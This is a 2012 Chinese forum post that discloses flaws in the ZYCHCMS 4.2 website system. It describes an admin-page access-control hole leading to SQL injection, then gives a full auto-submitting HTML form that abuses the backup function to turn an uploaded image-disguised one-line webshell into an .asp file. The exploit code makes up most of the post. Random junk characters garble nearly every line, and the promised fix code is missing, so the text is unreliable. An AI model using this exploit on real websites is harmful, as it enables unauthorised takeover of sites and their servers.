; Q R' a5 I0 i0 Z
; x, u6 T) T8 I3 E# ~0 O3 p
! m; {' @0 Q2 `, }1 Y/ b1 N! W/ H: L! r7 C- {9 l+ f
影响版本:ZYCHCMS企业网站管理系统4.2(存在以下两个文件的版本应该是通杀)$ l' g# g. q) V" v, D. H
①SQL注射漏洞: r' [* V; F g! v( L+ k
漏洞文件:/admin/add_js.asp & /admin/add_xm_jiang.asp
3 E# q1 d2 e0 m/ |6 B7 R 漏洞原因:未过滤
+ e+ C3 d; q$ R- Y- {9 C 漏洞代码:
% P" d) B+ P% @ 都是相同的,文件开头没有调用过滤文件/admin/seeion.asp,导致没有对当前权限进行判断,就直接操作数据库。
8 L/ `: E! g. l0 i 修复方法:在文件开头加入代码
5 r) K4 _$ p7 y1 r0 U2 ^, D/ k2 y& N
1 W- ]( m8 i% X: O! h+ `: Y, o7 c/ k! C4 `
②后台拿WBSHELL
: i5 ?. J. d7 `7 b: R" d 进入后台有一个数据库备份,可以通过本地提交突破创建.asp后缀文件夹,并将一句话备份进去。4 M# M3 u; h! Y1 ]9 n$ a( F
这里在网上找了一个,改了下,将就着用。4 b" q1 y5 l4 w
以下是代码本地提交代码
* Z7 d3 N# F, q1 Z. f 1 V, O+ O3 N) _2 X+ G% [3 h
+ S9 m/ K J8 _" ]+ Y
<form method=”post” action=”http://localhost/admin/Manage_backup.asp?action=Backup” name=add>$ t( L! N5 X& ?" d
<!–eg:http://127.0.0.1:99/admin/Manage_backup.asp?action=Backup–>/ I+ z) H* [2 a$ }: C4 w
<tr>
! {5 l. D. b) ~5 c f; T <td height=”30″ background=”images/bg_list.gif”><div style=”padding-left:10px; font-weight:bold; color:#FFFFFF; text-align:left”>备份数据库</div></td>
; D8 x3 w" j3 g: R9 E# @9 W </tr># K- e: l: u3 Z' J8 J
<tr>7 x0 A' N6 I. }. E+ b; W3 _
<td bgcolor=”#FFFFFF”><span class=”back_southidc”>
6 g; h+ M( V$ I& m7 c2 |. b </span>6 q* Q) p5 |. T" ?2 l4 A/ ~& x
<table width=”100%” border=”0″ align=”center” cellpadding=”5″ cellspacing=”0″ >7 }3 s/ u" }0 C C* I9 A9 K
<tr onmouseover=”style.backgroundColor=’#EEEEEE’” onmouseout=”style.backgroundColor=’#F1F5F8′” bgcolor=”#F1F5F8″ >
8 f9 z0 p. ~5 L$ V6 v# g <td height=”25″ width=”30%” class=”td”><div align=”left”>当前数据库路径</div></td>) F$ i( R. ~1 q, L
<td width=”70%” class=”td”>90sec. K5 L9 v8 S8 d- `, W0 w( F }
<div align=”left”>
# [) M" s4 W1 i* m3 p <input type=”text” size=”30″ name=”DBpath” value=”此处为你在其网站上传的图片格式一句话路径” />
* d% Q. p# I& R, j9 J <!–eg:../uploadfile/image/Logo/20120803130885328532_ZYCH.jpg>2 |7 u" G H% v9 {1 C$ R' p
<input type=”hidden” size=”50″ name=”bkfolder” value=”123.asp” />
; m/ P# U1 z4 W </div></td>
7 [: p% o( ~3 c2 } </tr>3 |& M n4 O' \2 w
<tr onmouseover=”style.backgroundColor=’#EEEEEE’” onmouseout=”style.backgroundColor=’#FFFFFF’” bgcolor=”#FFFFFF”>) Y7 W/ T9 F) p
<td height=”25″ width=”30%” class=”td”><div align=”left”>备份数据库名称</div></td>
/ ~: x; Y/ w5 R/ d/ ~& ~ <td class=”td”><div align=”left”>
; c9 J1 C" d: p j <input type=”text” size=”30″ name=”bkDBname” value=”4.mdb” />; f/ N: Q( H! g1 v9 `
[如备份目录有该文件,将覆盖,如沒有,将自动创建]</div></td>+ }' P. {7 Z3 `- \, E
</tr>
; K( Y: l" ~- Y+ n+ L0 Q <tr onmouseover=”style.backgroundColor=’#EEEEEE’” onmouseout=”style.backgroundColor=’#F1F5F8′” bgcolor=”#F1F5F8″># O s! o* @" ?/ ~' W
<td height=”25″ width=”30%” class=”td”><div align=”left”></div></td>
9 T+ c, o6 k0 p <td class=”td”><div align=”left”>
8 s7 x+ s) Z5 e$ o w n& t <input type=”submit” value=”确定备份” class=”btn”6 O% i2 Y/ _# H0 L; w/ ?
</div></td>; r& r& M0 y" |+ E$ C
</tr>& S1 |' _: R+ R" U8 _
</table></td></tr></form>+ L% a. B$ X6 k. L9 D5 F
</table>9 I( p# w) h5 K4 y4 c3 ?! m
</td>* k: e0 ^; Y S8 E. @) X
</tr>0 i! ?8 k6 n' E* s& k8 b
</table>
4 ?! t) E! k' \4 V: Y' i <script>
R& o7 I: h# D' p' n6 O8 {' @ document.all.add.submit();
, |' I, s3 U" q$ X" z! f: x </script>; v* _( A8 Z! N( i
( w& f) k" q, B, ?7 T4 c
& Q; _) t: e7 j% _+ q: n4 X
' H, Q6 M' p* c w: T3 [4 D( E
# o4 c. N0 p1 ^4 A) v0 n( n
5 s# e0 C$ d! h& K N* `8 `
: e6 ?1 j) u( O7 a
* ?+ N0 ~( N1 r+ S* y9 u1 f
' U" ]/ c- [5 w! b4 ]4 ?' r) n& c) X7 I
" t2 l5 Q6 u& s7 T: t" j
|
发表于 2012-9-10 21:09:51
收藏
支持
反对